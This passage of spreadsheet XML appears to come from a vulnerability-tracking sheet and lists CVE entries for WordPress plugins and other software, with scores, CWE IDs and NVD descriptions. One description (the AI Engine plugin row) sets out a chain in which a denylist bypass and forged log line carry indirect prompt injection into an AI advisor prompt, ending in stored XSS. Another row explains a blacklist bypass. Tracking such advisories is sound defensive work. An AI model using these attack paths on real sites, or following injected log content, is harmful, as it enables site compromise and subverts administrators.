          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Affected products do not properly synchronize access to their monitoring functionality. When multiple clients send concurrent requests, this may lead to incorrect reads or writes, or to corruption of internal memory structures. An authenticated remote attacker with monitoring access can exploit this issue to cause incorrect data processing or a denial-of-service condition.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79625</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85679</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>The Extendify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'styles.blocks' Block Type Key in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because registerIncoming() is hooked on rest_request_before_callbacks and runs before WordPress evaluates the route's permission_callback, meaning any unauthenticated POST, PUT, or PATCH request to a /wp/v2/global-styles route can trigger the vulnerable code path.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85679</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93624</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Music Player for WooCommerce &lt;= 1.9.1 versions.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93624</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93651</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Author PHP Object Injection in Minimum and Maximum Quantity for WooCommerce &lt;= 2.1.2 versions.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93651</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93771</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Cost of Goods for WooCommerce &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93771</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94122</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Responsive Slider Gallery  &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94122</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94677</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Kadence WooCommerce Email Designer &lt;= 1.5.19.1 versions.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94677</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96343</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96343</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96344</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in eCommerce Product Catalog &lt;= 3.6.0 versions.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96344</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96561</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>The AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.8.0 This is due to a chain of missing input neutralization and output escaping across the /mwai-ui/v1/chats/submit REST endpoint, the PHP error-log parser (MeowKit_MWAI_Helpers::php_error_logs), the Advisor task (Meow_MWAI_Modules_Advisor::run_advisor), and the Advisor dashboard widget (advisor_metabox): the server-parameter denylist in chat_submit strips only exact key names such as 'model' while convert_keys() later canonicalizes 'model_' back to 'model', allowing an unauthenticated caller to place an attacker-controlled string (including CR/LF) into $query-&gt;model; final_checks() throws an Exception whose message embeds that raw string, and the non-streaming, non-admin catch branch writes it to the PHP error log unmodified — creating a forged log line that the plugin's own parser subsequently returns as recent PHP-error content; run_advisor() then appends that content verbatim to the AI prompt (indirect prompt injection — CWE-1427), the returned JSON is stored in the mwai_advisor_data option with no schema validation or HTML sanitization, and advisor_metabox() concatenates the resulting 'title' and 'description' values directly into the WordPress dashboard widget without esc_html(), wp_kses(), or equivalent escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the WordPress dashboard.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96561</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96815</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>Custom role Privilege Escalation in Vitepos &lt;= 3.5.0 versions.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96815</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96832</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Content Egg &lt;= 6.3.1 versions.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96832</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96833</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Ultimate Addons for Contact Form 7 &lt;= 3.5.51 versions.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96833</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97245</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Shop Worker Privilege Escalation in SureCart &lt;= 4.7.2 versions.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97245</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97256</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Page Builder by SiteOrigin &lt;= 2.36.0 versions.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97256</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97347</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>The Post Views Stats Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The plugin's only input filter is a substring blacklist for known bot signatures (e.g. 'bot', 'spider', 'crawler'), which can be trivially bypassed by crafting a User-Agent payload that omits those strings.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97347</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100507</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
